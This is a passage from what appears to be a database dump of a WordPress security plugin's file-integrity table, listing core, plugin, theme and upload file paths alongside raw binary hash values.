0\0\0\0\0\0\0\0\0','��_�3$_�n��5��X',';ʐ\'8�4aOoY8-U�62���K�qq�$B�x','',0,'?'),('��\\��h\Z��)Ġ�','wp-includes/blocks/paragraph/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{3�&�\n��%t��','�w�Ņ�k]� �y>���)q�8j�A_Sʌkׂ','',0,'?'),('�*Q. �-c�%�D','wp-content/plugins/wordfence/lib/flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��c�磭��c�-','8�Y��CO���0�j{�\Zx��D�Ė��x�O�','',0,'?'),('\n M�I�~�YEO��]�','wp-includes/blocks/post-featured-image/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j鏉��P�)�3K�','����%�,\'\\S�GK,�bCT����S�','',0,'?'),('\nE(4.�-���)��]','wp-content/plugins/wordpress-seo/admin/tracking/class-tracking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܉5����Dn�<%gT','cB��n�u�Y�Lh�$�7w���v��H�','',0,'?'),('��ܡ9�u_\\\n�9�\'','wp-admin/css/color-picker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���x��Ti6���','ۣq��T��zu���Oi�\\�5ЯY�u��~=c','',0,'?'),('Ʀ�+����W�f3','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���7dž�唝�\0q�2�','#/{�%�O\ZM��*��p9�:�*�_^�\"�:Q�','',0,'?'),('�KU�g0MU�/��ʇ','wp-admin/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xo��_���Բ)\n��r','�(�Z!.�e��TU92;�����ݏt5o�^','',0,'?'),('89�|���taM8','wp-content/plugins/wordpress-seo/js/dist/externals/componentsNew-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�frS>5�b��YTm','8O��E��$�hG�E? �H�u`LX�E���','',0,'?'),('\Z[�`��0CI$T��\'�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�H��$I�3��^0','Dsmr?v�jz����Mo�3=b0���K�R#','',0,'?'),('%����/���ڱ~��','wp-content/uploads/2019/12/pexels-photo-350x220.jpg',0,'²s�DxAS� {%Y�b�','²s�DxAS� {%Y�b�','�K�b�x ���P��ΙX�W�DŃ0�����u','',0,'?'),('+��棩���Ve���','wp-content/plugins/wordpress-seo/languages/wordpress-seo-fi.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���mXp<���\"��','ե:4���Ց>��x��_g�ܷJ��\'��`','',0,'?'),('4;V��\'�/����f�','wp-includes/js/jquery/ui/effect-scale.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KaJ�d���J\'^','_��q�x#�_�\0��<�J�c��~�ұ�ǫ','',0,'?'),('7���OW\n@�a','wp-admin/css/colors/modern/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ф�o���/}��j����','7�(�3�\r�@����H��l͋��%>�M����','',0,'?'),(':�f�?bj���.���','wp-content/plugins/wordfence/views/blocking/block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']#{�1�����&v�','�^P�b.|�=>�S����#\'\r�l�]�^�','',0,'?'),(';�{���k���s��','wp-content/themes/twentytwenty/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j������e- �','��/�dE�|#cOBy2���i�c������','',0,'?'),('T�Ę5VH���P{��','wp-includes/Requests/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Flkٮ�<v�wSH�\\','-@��g %�����uON\\}@l���f\'���','',0,'?'),('��jo����8D��k','wp-content/plugins/wp-cerber/assets/flags/tz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�0���1�_NM','��_i`K�@D4���=�Z�2QcuY!z�=����','',0,'?'),('��q��YG�%����B','wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��Ey�Fp�`�����','���،�@C�B+��=\Z���������','',0,'?'),('���C\n���U���','wp-admin/js/custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݎ�\Z���\Zڸ���','��v�N����;d�V��5d���t�,�','',0,'?'),('�n��O.���}','wp-content/themes/twentytwenty/templates/template-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�R��w�O��,�|�','��\r���:�{Yh��\0�o\ni#�uޡh�s���tr','',0,'?'),('��0l��j�0+%�','wp-includes/SimplePie/Source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��A:�$]B-�vw�)','�\"���9M�a���U�_�h�I��>�,]�C�','',0,'?'),('��ٕ2�*����NI�','wp-content/plugins/wordpress-seo/admin/menu/class-network-admin-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>YT����.p���','f\Z�$B��m��9cy���1�J�} �Bwj\n','',0,'?'),('��e�i��3��y9#','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-es_MX.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nQ3�[��R��YX��','��7�2[���SgiAZf����\Z�����\\','',0,'?'),('�[��<�?{���:6','wp-content/uploads/2019/06/fiber-optic-2749588_960_720-768x512.jpg',0,'TIﱦ�$�6.��+Q2�','TIﱦ�$�6.��+Q2�','4�f��ʀ��\r�k��L8!���Oa��$9','',0,'?'),('�>�*a�\\A8g��F$','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-zh_CN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&κy�F�w�Ӗ�\0Hv','�A���Dv��.H�%J�Iׁ|�>*e�M','',0,'?'),('萿��U����ŚW','wp-content/languages/plugins/disable-gutenberg-en_GB.mo',0,'[U\0�vB��e:qzQH�','[U\0�vB��e:qzQH�','��\\G��s���Qh^�����m7�q[X�f���','',0,'?'),('���窒�u��\rZJW+','wp-content/plugins/wordfence/images/help.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$N�;\'��M��� Y','���\Z�7\0��r/i��z;ki,�=L�Z�g���','',0,'?'),('�)����t\r�,�Jڼ','wp-admin/options-permalink.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&v\"W�Y�I��7�','\0����3<�V�)>�^�08��$]�(�4�N','',0,'?'),('�?DŽ����:\n��X','wp-includes/customize/class-wp-customize-theme-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �K���WTՂ�c�','�&�^��J�eFX*i-t��;��8��t�\0O��','',0,'?'),('��g�<)��t.F��','wp-content/plugins/wp-cerber/assets/flags/aw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�g�qAŎ�RAj�?&v','J �M��wPs���0)n����F����b��','',0,'?'),('\Z��) �%iy�δ','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}+#z,��e�rEJ-','sf��q@��8�!yW�&ڔA�+/�uY���44�G','',0,'?'),('\Z�K��a�2Sc��kI','wp-content/plugins/wp-cerber/assets/flags/za.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ֨���˅hq�d�','s��Δ��֫V��`��`�R ;��cϯ���','',0,'?'),('3�d����yj�����V','wp-content/plugins/wordfence/lib/menu_firewall_blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@O<�.<)�$�ޓ��','\Zޛp��� ���>��B*\'��^����T�','',0,'?'),('JD�\ZS�/�o��77/','wp-content/plugins/wordpress-seo/admin/views/class-yoast-input-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�������q��=�','�ݱ1\0E�\rpct�´�r6�C�[��3-��','',0,'?'),('R�r�r�(�ȟ��P�','wp-includes/blocks/media-text/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���v�T-�M�%g7�','��\",?sM�|5H1���/��&+�;cޢ���F','',0,'?'),('Wl��y:�\0Vn`�d\0�','wp-includes/js/tinymce/plugins/wpview/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&���\rb���!���',',�`i�t���ڎ�Tm��l��k�s�\r=','',0,'?'),('fj��)�t3�aB+�','wp-content/uploads/2019/08/roof-768x512.jpg',0,'��W#y�c-��z�','��W#y�c-��z�','�*u�1\Z���؇$5@�{�NC��fL�-Ê','',0,'?'),('h8�ʯn��-�� *','wp-includes/blocks/buttons/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�X@4�=�k�wjW','�ZvrNM)��I6�,�B%{��i���4�','',0,'?'),('o�ܧ�x�2��fO�','wp-content/uploads/2019/09/garden-1680802_960_720-300x250.jpg',0,'��0^�g6�֝L/�','��0^�g6�֝L/�','d��Mԕ�>�S�\0�\rl�*Nx����VY�Nt`','',0,'?'),('��4}8�h�J\"g��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�W�W��A�\r�t��','��?�]K�r���2 ���� �p�\\G��O�','',0,'?'),('�9��>���7','wp-includes/blocks/site-logo/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;&kg��\"���*����','�LuG�`���TYL��흯#Yﰤt�^�J','',0,'?'),('�,�4#��(�#','wp-signup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ģ�`,��E��@�<','�ܽf��?c�Z��m)|Mtɬt��\0ݏ�','',0,'?'),('��L9��}�X�)�','wp-content/plugins/wordpress-seo/admin/statistics/class-statistics-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\����W����K�\0','�mH\\.�`����:J+Az���7�JQ�y\"x','',0,'?'),('�)�Pe��D��� s','wp-includes/blocks/group/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��օ�5ރ��|�q�','۞\Z���}=eJ]�0]��uCG�.�0NA�\Z','',0,'?'),('ǖ��d�!s<X��Я','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�1{,˾�ʂ��','<�G���$�U+�k�L>\0h�ahB��S�-�','',0,'?'),('쩯��b�/�y;�f','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nh��e�S�,����!','��,GK��f���o�a��t}߆#Z��s�v�\'�','',0,'?'),('�*沫�Q�N','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oV�7PR~���ai','b�\Z�����s#:�*�\\���\'�i@���qa','',0,'?'),('������\0�V�d�W2','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/ParameterCircularReferenceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n̬�\'�^���e�{g�$','�B�^��x^(�H@W�q�s���O|�to��#','',0,'?'),('�Ĉ��ψ�x�>�H','wp-content/plugins/wp-cerber/assets/flags/sd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1y����s�)�x�','� �ZL���2���H��j�o�i�����','',0,'?'),('`�7��@iI��1� �','wp-content/uploads/2016/11/kitchen.jpg',0,'^�e �8U��-�=AC','^�e �8U��-�=AC','�Pp>i-E�����o�A�H: AO���','',0,'?'),('��y7��MA�@���','wp-includes/widgets/class-wp-widget-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ب&cF:�5��i^O','�A�_~�3yo\'iq)��^D�E��4�, �s','',0,'?'),('�_)0d|�6_�;n','wp-includes/js/dist/rich-text.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�9vũ\n��\"t�u�','�G��̚���e1�\0!��y?YDV�Y=�اZ�$','',0,'?'),('4��i���n-����','wp-content/plugins/wordpress-seo/src/presenters/slack/enhanced-data-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MT��\'#�=��/�','rĪ:�����CI� b�j}z���W�Ω','',0,'?'),('=� ��\\vV�����x','wp-includes/blocks/rss/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�zwj2���;3� �','�ZE�]!%��AH�XX%{�GT�p��1U','',0,'?'),('f����r�(��S�y','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ne.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=y�?� sϑ�jb��','RFZ���X+K���m�zT�k;���30�','',0,'?'),('��<��i����Q\0','wp-includes/js/dist/reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9Ml��)�vI�q��','qhZ������U�T\nr�cn�ݭ����;�','',0,'?'),('�`&%eF�g����d','wp-content/plugins/wordfence/models/block/wfBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=���L@�ʐA��','\n�S�Y>�l�*ϸC@z&+ z�dAW���w�\n\r','',0,'?'),('�\"�sybNl-���','wp-includes/blocks/preformatted/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)1n8.R���*','v�[��7�/N@3)}�o�x���t�7�Nk��','',0,'?'),('�:8�Ia��øl�m','wp-admin/includes/class-ftp-pure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&�}�\\3��J�� \0','�\nS�{U��Cdz$����y���a|8�[','',0,'?'),('�[���������R','wp-content/themes/twentynineteen/template-parts/post/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\J��w���','2� ��ă���`�|��K 6<#:Gׯ��s','',0,'?'),('����KqM���{���','wp-admin/css/dashboard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������>� 4��','��kST�_�e�S-~���-�j�W����+�','',0,'?'),('��sݜ�Þ3�����','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��7Ih�!���_�','�y�۹�����������!�H���HGH','',0,'?'),('�{xZ�c�\"�hb�?�','wp-includes/js/dist/dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gF�!Y��(��E�','���G�5a�*�G��S�$!X�O\0ʺ','',0,'?'),('�TB��O>�v2��}Ea','wp-includes/SimplePie/Locator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�3�y�%14���','<���ms�4�3p-I�/�8\'J�� }.�','',0,'?'),('Ȓ\"N=�L��.�U','wp-includes/blocks/more/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ύU����wiA���G�','��k/q��֧���]�y��A��ݾ}G���','',0,'?'),('��ϝ��6=��̍�','wp-includes/blocks/post-excerpt/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��)\0Ь�/o','F�+h���p��a�qÉ�Fb�A�3i�<��','',0,'?'),('��)���iٮt�v�J','wp-content/plugins/wordpress-seo/packages/js/images/icon-twitter.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�쟚X�n�W��\'fP','��e��USq�����|��(v�y�V�%��3�X%','',0,'?'),('��W�MF`3��$��','wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��CECZ6���e�','\\W��.£���;\\ �K��[�zHEI�8��A','',0,'?'),('�-ФQ�1Ц\r �','wp-content/themes/twentynineteen/sass/variables-site/_variables-site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G\0��\\t4����E�','�,%d:?�-�ǯM�!k���gF6�ݱ���R�lj','',0,'?'),('��5��F���bA��','wp-content/plugins/wordpress-seo/src/helpers/schema/html-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WgF������\0��/��','=�vs/��yF��o��|�lD\\4j;�#��zk�','',0,'?'),('��*�7\r��?�','wp-includes/class-requests.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=n�L��jdBS;S?','D;U�\\�Q&�G���U��κ�\r����p-','',0,'?'),('L��e`d�˻��W','wp-content/plugins/wp-cerber/assets/flags/je.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�l1�r$~�A�)','wp-content/plugins/wp-cerber/assets/flags/as.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�/����Z�3�','��UŰ�\r�^�W�}�Ux\"�C�@�Scu�l','',0,'?'),('&�J]z8.걤K�*','wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����w^B���X1','�ts���`3�9�S���Ȋ_g���^�8','',0,'?'),('�s��y��%#�r��=','wp-includes/rest-api/endpoints/class-wp-rest-widget-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g4 V�\'_$�','(���\nN[-��$�,��AUk�q�e�A�38','',0,'?'),('�of?�3�P�1�\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\"̤/O���Y��\'','�8�e�T�et\r j�P�/��J���<^�rӥz','',0,'?'),('3��9��v�&/�Cd�','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/MacAuthorizationTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0ld��lu�O�:��','��[��y��\\��پ�8*�&��= ��','',0,'?'),('>\"�����$��.u��','wp-content/languages/plugins/wp-cerber-en_GB.mo',0,'�k��?m�<*�Bk~O�','�k��?m�<*�Bk~O�','\r�v���.?���څ6��)*���B��l�','',0,'?'),('F��e���}�(��','wp-includes/js/jquery/ui/dialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']2�z�L!E��,�C\Z','���|\r�Ce>�/k˪�\"E�0�݀V�L�','',0,'?'),('N�\0f��~;I���','wp-content/plugins/wp-cerber/assets/flags/bm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��g��¶Mn�z�','��<������@ H�*��eթ�G�)�-CIԲ^','',0,'?'),('W��5^��l_�_#�','wp-content/themes/twentynineteen/sass/typography/_typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�7�2��n��t','��nek�o@�l�_���ky~�YWŢA���','',0,'?'),('c�|�\\��ݡ���Sd','wp-content/plugins/wordpress-seo/js/dist/languages/fa-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l��.�S\\��*e]�','<� �E�V9�j���`�Y�g�%�1�I�p�p','',0,'?'),('i1��E~N�I�A͔��','wp-includes/Requests/Cookie/Jar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y6��������5�D�','��5�t���i�kt�j3�\r��h�v�acJ\r��','',0,'?'),('k��[V�l��Y�','wp-content/plugins/wordpress-seo/src/exceptions/indexable/invalid-term-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n��v��b��','_W䰈�V�fP�0 �[�i�L�4+��S>�D`�','',0,'?'),('s♼{DR�[�k�1�I','wp-content/plugins/wordfence/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zF��ހW�\rl�~6','V�{��Q9�V ����J X�q���ڀc�','',0,'?'),('����X/��\0�� ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����iJ�B�!<\0','V��4�^�C�D�\Z��������;��U�z','',0,'?'),('���}/�pS���','wp-includes/blocks/page-list/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Jn[\'Zp!�Y�$�S','��p�-CF�M�b�b�-H�������l�','',0,'?'),('�N3M�\n��S��0j','wp-includes/js/dist/block-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0}�GUt0bsh�','�����|����\\xWQdH��g���_���k�3��\"','',0,'?'),('�x(�ťܺ�.���Շ','wp-includes/class-wp-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9]�K�UJW�*��h�=','���4�\ZQuA^ء��j$M��0�\0','',0,'?'),('Ԓ��A����r��^','wp-includes/js/wp-custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C@$ҷ�SE��#�','��\"�y�䓧��}��^H�z�%��Z��у���','',0,'?'),('�8r���~x�T�F�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�\'�:��\Z��9I','�*�H�[8�em�\Zx�\Zc�=x�E����m','',0,'?'),('�z��a>`<��!�C�t','wp-includes/css/dist/block-library/reset.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�U_`�#��RC���','�~o\n�婠ibЗӪ��ȳS����;�Ү�Y','',0,'?'),('�^0p����k����M','wp-includes/css/dist/nux/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�Ҩ r�c�V�','mt���� ҡ;��E�K�U�8D��8�-�B','',0,'?'),('�S ����g N�d','wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Vg@�ݕX43�Ё',',D�U�}�>���q��!�5r�)0G����','',0,'?'),('���h]��C���A*','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'I�˞aFtz\\�Ǯ','���Ҭ�\ZADs���5����?���D�A/<�:','',0,'?'),('�0ܚ�Z�I�丱N','wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U巃�� qD�F��H','���Ԧ�!���ӢtL�k.�\"1��Cm�Kg�','',0,'?'),('�3ƹܕj�bi�Υ�','wp-includes/customize/class-wp-customize-nav-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@V{R#8�7n�n\n�','��a�H����Muyw?�h:�B��<=��,##�','',0,'?'),('��OJ��2������','wp-content/uploads/2016/11/kitchen-2165756_960_720-150x150.jpg',0,'��\Z�Pl쭳{�2','��\Z�Pl쭳{�2','���d ��\00/�2�0/zƫc�J��*�cB','',0,'?'),('� wE��r��} �','wp-content/plugins/wp-cerber/assets/flags/gq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�>.ⶱ���G','�d����^f�r��=�mM���Y��,���','',0,'?'),('\Z6B8��c����eg','wp-includes/blocks/shortcode/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����X�cy F�JGs','� �L���(��5g\0��[[{d��Nm�j���','',0,'?'),('b���E�����4t=','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̻o��wG>p','�I�`I^{�Pנh�Q��e:sG^��8�sĚ','',0,'?'),('��,=9���h�6K�','wp-includes/js/jquery/ui/draggable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:2��g9�tL�D�','��Cu�o.t�?�xd�x�CK�6�Ηp_�','',0,'?'),('��un�Rـ���:9��','wp-content/plugins/all-in-one-wp-security-and-firewall/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\\"*��!83�+','��Ӻ:�B��ֶV�Ɍ)�Nɳ��p�','',0,'?'),('��T�j�����5�`q','wp-content/plugins/wordpress-seo/src/deprecated/admin/ajax/class-recalculate-scores-ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V!��NVBw��@��H','�O\Z;P3s���#��w���j�Ο�j#���','',0,'?'),('�\0Ƭ����#���(�','wp-content/themes/twentytwenty/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W��*�L�̶p�','R���h���(��(�Y���B�ެ���Q��KM','',0,'?'),('��ȯg_�%��6$�','wp-content/uploads/2016/11/retro-3249927_960_720-150x150.jpg',0,'{(����J�!F�EY','{(����J�!F�EY','a4wD�pr̕@�}/���5˶�|C�#7\0(�Q','',0,'?'),('��]�Ɖ ��e','wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�I����N�M5�N��','�~��0_Q���cQRw��^��~0u�8g�V','',0,'?'),('�r���*�uwV51�','wp-content/plugins/wordpress-seo/languages/yoast-components-sr_RS.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?(��+����y�xj�','3yT��0�B�Z��<dX*5����)����n�8�','',0,'?'),('Կ,6_���xd�ʞ','wp-content/plugins/wordpress-seo/admin/views/partial-notifications-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','âv�N~�GZ<z�C','q�jI���!_��y2�χ�~il��δ��','',0,'?'),('�#O�������X^�v','wp-content/plugins/redirection/models/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ӹx�v)�W�o�',':H,�}��\"V%5`<�Z`��u�T5\\}j���u�S','',0,'?'),('�0���զ����','wp-content/plugins/wp-cerber/assets/flags/gw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*qWM����f2�c','d�n�;L�m%��\"NA�oZE!���J�_͆�','',0,'?'),('��>�/ᡇ_����','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l([qא��D#��','\\sٶ�hb�2.;�m`F��r^&�H-w �yV�~','',0,'?'),('�&UX\r�L4{����','wp-includes/js/utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��0�`ߣ���MVi`','�js�@Vna�v�t\'ȀD��,݆���T;','',0,'?'),('\ZmMcsr)�ԩ��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/CachingStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n���W�ڔ7�LW','��_uk(掍����g6=L?\n��@����B>Z�','',0,'?'),('\Z֧��\\\Z�h�i','wp-includes/js/dist/blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�;Z\"�y��u�uH�','��VqE\" d0;�ܬ�1��D�s���(��','',0,'?'),('\Z�O���l5fTtŨ�','wp-content/themes/vega/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�=�*<٢a��','=E�����>ln&)�w�g%k��E�\0L�Ds','',0,'?'),('\Zxi*u�8�d�&O�;','wp-content/languages/plugins/wordpress-seo-en_GB-25db11aae3ef43638a238cfacc4de7b4.json',0,'�4�\Z��0��j�dw','�4�\Z��0��j�dw','Y=c�\0V ��(x(��ظOH���_~��o','',0,'?'),('\ZO�3F5K�;�@ �','wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�q\\�}����[�','�[�T�n�Ejd�(�$�:!�h�Ν\0�s�><','',0,'?'),('\Z&�cR�< FiC�','wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƥܐ�W^�[�g�','�dL�����cK~=0jE�]�����~\"�','',0,'?'),('\Z\'�N���b9�r','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/integrations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.���ZP\n�f\Z�4�k','��3�Q��:ii�$�1�kw,#e�;�XSO','',0,'?'),('\Z?�ǸƢ}5^p��','wp-content/plugins/wordpress-seo/src/builders/indexable-post-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��^��}aFw��\r�`h','�u�/O\\�g)��P�hp.��]�uHc���','',0,'?'),('\ZN\Z�`i̳%�ج0','wp-content/plugins/wp-cerber/assets/flags/cn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���-V�|֬S���','j�_�\r49�>�x+E�X��H��dF���K�`','',0,'?'),('\Zq��Ȥ9cj�ͅa�','wp-content/plugins/wordpress-seo/css/